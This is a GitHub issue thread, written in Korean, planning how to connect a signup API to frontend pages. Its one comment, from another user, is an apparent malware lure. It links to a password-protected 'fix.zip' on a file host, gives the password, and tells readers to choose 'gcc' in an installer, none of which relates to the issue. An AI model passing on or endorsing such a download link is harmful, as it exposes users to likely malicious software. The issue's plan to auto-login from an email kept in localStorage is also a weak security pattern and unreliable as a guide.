### ISSUE TITLE
[FEAT] 회원가입 API 연결

### ISSUE THREAD

**Issue by kwakseongjae** [dongibuyeo/core-frontend#59]
## 어떤 기능인가요?

> 회원가입 API를 기존 페이지에 연결합니다. 

## 작업 상세 내용

- [ ] /signup/emailCheck 페이지에서 이메일 중복검사를 진행합니다. 
- [ ] /signup/profile 페이지에서는 별도의 api를 연결하지 않습니다. 대신 정규표현식을 이용하여 클라이언트 테스트를 진행합니다. 
- [ ] /signup/push 페이지에서는 이전 페이지들에서 저장한 정보를 바탕으로 회원가입을 진행합니다. 
- [ ] /와 /home 페이지에선 localStorage에 email을 저장해서 이를 바탕으로 자동 로그인을 구현합니다... (참으세요..)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
